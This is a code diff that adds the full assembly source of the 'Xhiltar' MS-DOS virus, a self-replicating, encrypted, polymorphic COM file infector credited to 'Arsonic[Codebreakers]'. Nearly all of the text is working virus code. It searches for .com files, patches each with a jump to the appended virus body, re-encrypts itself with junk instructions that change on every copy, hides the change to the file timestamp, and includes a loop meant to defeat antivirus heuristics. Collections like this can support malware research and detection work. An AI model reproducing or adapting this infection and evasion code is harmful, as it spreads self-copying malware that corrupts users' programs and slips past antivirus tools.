mov fix

MSDOS/Virus.MSDOS.Xhiltar.asm

@@ -0,0 +1,151 @@
+; The Xhiltar Virus 
+; By Arsonic[Codebreakers] 
+; Type: Runtime Appending Com Infector 
+; Encrypted: Yes 
+; Polymorphic: Yes 
+; Time/Date: Yes 
+; add Attrib: Yes 
+; Changes Directory's: Yes (dotdot method) 
+; Anti-Anti-Virus: Yes (anti-heuristics) 
+db 0e9h,0,0 
+start: 
+call delta 
+delta: 
+pop bp 
+sub bp,offset delta 
+mov cx,0ffffh                   ;fuck up those heristics! 
+fprot_loopy: 
+jmp back 
+mov ax,4c00h 
+int 21h 
+back: 
+loop fprot_loopy 
+lea si,[bp+hidden_start] 
+mov di,si 
+mov cx,end - hidden_start 
+call encryption 
+jmp  hidden_start 
+value db 0 
+encryption:                       ;encryption routine 
+call poly 
+encrypt: 
+lodsb                         ;1 
+_1stDummy: 
+nop                           ;1 = +1 
+xor al,byte ptr[bp+value]     ;4 
+_2ndDummy: 
+nop                           ;1 = +6 
+stosb                         ;1 
+_3rdDummy: 
+nop                           ;1 = +8 
+loop encrypt                  ;2 
+_4thDummy: 
+nop                           ;1 = +11 
+ret 
+hidden_start: 
+mov cx,3 
+mov di,100h                    ;restore the first 3 bytes 
+lea si,[bp+buff] 
+rep movsb 
+find_first:                    ;find first file 
+mov  ah,4eh 
+find_next: 
+lea  dx,[bp+filemask] 
+xor  cx,cx                     ;with 0 attrib's.. 
+int  21h 
+jnc  infect 
+close: 
+push 100h 
+ret 
+infect: 
+mov ax,3d02h                   ;open file 
+mov dx,9eh 
+int 21h 
+xchg bx,ax 
+mov ax,5700h                   ;get time/date 
+int 21h 
+push dx                        ;save the values 
+push cx 
+in   al,40h                    ;get new encrypt value from system clock 
+mov  byte ptr [bp+value],al 
+mov ah,3fh                     ;read 3 bytes from the file.. too 
+mov cx,3                       ;be replaced with a jump to the virus 
+lea dx,[bp+buff] 
+int 21h 
+mov ax,word ptr [80h + 1ah]    ;check for infect 
+sub ax,end - start + 3 
+cmp ax,word ptr[bp+buff+1] 
+je close_file 
+mov ax,word ptr[80h + 1ah] 
+sub ax,3 
+mov word ptr[bp+three+1],ax 
+mov ax,4200h                   ;goto start of file 
+xor cx,cx 
+xor dx,dx 
+int 21h 
+mov ah,40h                     ;write the 3 byte jump 
+lea dx,[bp+three] 
+mov cx,3 
+int 21h 
+mov ax,4202h                   ;goto end of file 
+xor cx,cx 
+xor dx,dx 
+int 21h 
+mov ah,40h                     ;write the unencrypted area 
+lea dx,[bp+start] 
+mov cx,hidden_start - start 
+int 21h 
+lea si,[bp+hidden_start]       ;encrypt the virus 
+lea di,[bp+end] 
+mov cx,end - hidden_start 
+call encryption 
+mov ah,40h                     ;write encrypted area 
+lea dx,[bp+end] 
+mov cx,end - hidden_start 
+int 21h 
+close_file: 
+mov ax,5701h                   ;restore time/date 
+pop cx                         ;with saved values 
+pop dx 
+int 21h 
+mov ah,3eh                     ;close file 
+int 21h 
+mov  ah,4Fh                    ;find next file 
+jmp find_next 
+poly: 
+call random                    ;get random value 
+mov [bp+_1stDummy],dl          ;write random do-nothing call to encrypt 
+call random 
+mov [bp+_2ndDummy],dl 
+call random 
+mov [bp+_3rdDummy],dl 
+call random 
+mov [bp+_4thDummy],dl 
+ret 
+garbage: 
+nop       ; no operation instruction 
+clc       ; Clear Carry 
+stc       ; Set Carry 
+sti       ; Set Interuppt Flag 
+cld       ; Clear Direction Flag 
+cbw       ; Convert byte to word 
+inc  dx   ; increase dx 
+dec  dx   ; decrease dx 
+lahf      ; loads AH with flags 
+random: 
+in ax,40h 
+and ax,7 
+xchg bx,ax 
+add  bx,offset garbage 
+add  bx,bp 
+mov  dl,[bx] 
+ret 
+filemask db '*.com',0 
+three    db 0e9h,0,0 
+buff     db 0cdh,20h,0 
+dotdot   db '..',0 
+author   db 'Arsonic[Codebreakers]',13,10,'$' 
+virus    db 'the XHiLTAR virus',13,10,'$' 
+         db 'I LOVE U LISA',13,10,'$' 
+         db 'I LOVE U SOOOO MUCH!',13,10,'$' 
+end: